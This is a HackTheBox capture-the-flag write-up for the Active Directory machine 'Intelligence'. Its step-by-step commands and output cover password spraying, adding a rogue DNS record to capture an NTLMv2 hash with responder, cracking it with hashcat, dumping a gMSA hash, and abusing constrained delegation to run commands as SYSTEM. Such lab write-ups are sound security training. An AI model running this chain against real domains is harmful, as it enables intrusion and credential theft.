Intelligence - [HTB]
Table of Contents
Introduction
Intelligence is a Windows Active Directory machine from HackTheBox where the attacker will have to enumerate public files in order to find some users and the credentials for obtaining the user flag. Then, will have to add a fake DNS into the domain DNS for obtaining Ted's creds. Finally, the attacker will have to obtain a GSMA password allowing it to impersonate the Admin Domain obtaining the root flag.
Enumeration
As always, let's start finding all opened ports in the machine with nmap.
kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.248
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:21 EDT
Nmap scan report for 10.10.10.248
Host is up (0.041s latency).
Not shown: 65514 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49691/tcp open unknown
49692/tcp open unknown
49702/tcp open unknown
49714/tcp open unknown
55797/tcp open unknown
57669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 56.13 seconds
Then, we continue with a deeper scan of every opened port, getting more information about each service.
kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49685,49686,49704,49708 -T5 -Pn -oN PortsDepth.txt 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-08 04:05:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-08T04:05:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 7 17:06:37 2021 -- 1 IP address (1 host up) scanned in 96.96 seconds
Looking at the web page there are some documents that we can download.
Both of theme have usernames stored in the metadata fields. However, we can not do much with them.
kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator
Creator : William.Lee
Creator : Jose.Williams
Nonetheless, under the documents
directory seems to be are more files, following the same syntax but changing the date.
In order to download them all, I created the following script.
import requests
import os
URL_BASE="http://10.10.10.248/documents/2020-{:02d}-{:02d}-upload.pdf"
for i in range(1,13):
for j in range(1,32):
URL_FINAL=URL_BASE.format(i,j)
print URL_FINAL
status=requests.get(URL_FINAL).status_code
if status==200:
os.system("wget "+URL_FINAL)
You only need to execute the following commands in order to obtain a list with all the users.
kali@kali:~/Documents/HTB/Intelligence$ python obtainPDFs.py
kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator | awk '{print $3}' | sort -u > users.txt
Furthermore, inside the document 2020-06-04-upload.pdf
there is the following text.
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
Exploitation
We can find out which user the password belongs to thanks to crackmapexec.
kali@kali:~/Documents/HTB/Intelligence$ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
Now we can access to all shared folders.
kali@kali:~/Documents/HTB/Intelligence$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445 Name: intelligence.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
Under the Users
share we can retrieve the user flag.
kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/Users
smb: \Tiffany.Molina\Desktop\> dir
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Wed Jul 21 12:50:12 2021
Privilege escalation 1
Under the share IT
we can retrieve a powershell script.
kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/IT
smb: \> dir
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1460519 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
The script execute an Active Directory query in order to obtain all DNS domains under the Active Directory domain. Then, tries to access them sending the user credentials.
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
Hence, we can add a our own domain in order to retrieve the user credentials with responder.
In order to add a domain we need to synchronise the kali's clock with the server's clock and execute dnstool.py.
kali@kali:~/Documents/HTB/Intelligence$ sudo ntpdate 10.10.10.248
kali@kali:~/Documents/HTB/Intelligence$ python3 dnstool.py -u "intelligence\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -t A -r webMarmeus.intelligence.htb -d 10.10.14.245 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/media/sf_2_MisPostsBlog/HTB/Intelligence/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
Then, we need to execute responder waiting up to 10 minutes in order to retrieve the credential.
kali@kali:~/Documents/HTB/Intelligence$ sudo responder -I tun0 -A
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:9751b32b8379208d:4D13215C35DA7AB5751CC22BF9055653:01010000000000001E8542EDC67ED701F92F22BD457D234700000000020008004C0047005900480001001E00570049004E002D0056003800330031005400480050004800510056003100040014004C004700590048002E004C004F00430041004C0003003400570049004E002D00560038003300310054004800500048005100560031002E004C004700590048002E004C004F00430041004C00050014004C004700590048002E004C004F00430041004C00080030003000000000000000000000000020000000865082CE41604DB9E1765B44E059B2CECE9C0D8C3C18D96009F717D40156250A001000000000000000000000000000000000000900400048005400540050002F007700650062006D00610072006D006500750073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
With hashcat we can retrieve the actual NTLM password.
kali@kali:~/Documents/HTB/Intelligence$ hashcat -m 5600 tedHash.txt /usr/share/wordlists/rockyou.txt
[...]
TED.GRAVES::intelligence:9751b32b8379208d:4d13215c35da7ab5751cc22bf9055653:01010000000000001e8542edc67ed701f92f22bd457d234700000000020008004c0047005900480001001e00570049004e002d0056003800330031005400480050004800510056003100040014004c004700590048002e004c004f00430041004c0003003400570049004e002d00560038003300310054004800500048005100560031002e004c004700590048002e004c004f00430041004c00050014004c004700590048002e004c004f00430041004c00080030003000000000000000000000000020000000865082ce41604db9e1765b44e059b2cece9c0d8c3c18d96009f717d40156250a001000000000000000000000000000000000000900400048005400540050002f007700650062006d00610072006d006500750073002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
Privilege escalation 2
After trying a lot of stuff, we can retrieve a GMSA password with Ted's credentials.
kali@kali:~/Documents/HTB/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
kali@kali:~/Documents/HTB/Intelligence/gMSADumper$ python3 ./gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7
The service svc_init
has the primitive msDS-AllowedToDelegateTo which could allow us to impersonate Domain Admins.
kali@kali:~/Documents/HTB/Intelligence$ sudo ldapsearch -x -h 10.10.10.248 -D "intelligence\TED.GRAVES" -w "Mr.Teddy" -b "CN=svc_int,CN=Managed ServiceDC=intelligence,DC=htb"
[...]
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
[...]
In order to impersonate the service as Administrator we need synchronise the clocks once more and execute getST.py.
kali@kali:~/Documents/HTB/Intelligence$ sudo net time set -S 10.10.10.248
kali@kali:~/Documents/HTB/Intelligence$ getST.py intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Now, we are able to execute any commands as nt authority\system, obtaining the root flag.
kali@kali:~/Documents/HTB/Intelligence$ export KRB5CCNAME=administrator.ccache
kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'whoami'
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \EjMKGuQK
[*] Running task \EjMKGuQK
[*] Deleting task \EjMKGuQK
[*] Attempting to read ADMIN$\Temp\EjMKGuQK.tmp
nt authority\system
kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \usqqykxq
[*] Running task \usqqykxq
[*] Deleting task \usqqykxq
[*] Attempting to read ADMIN$\Temp\usqqykxq.tmp
[CENSORED]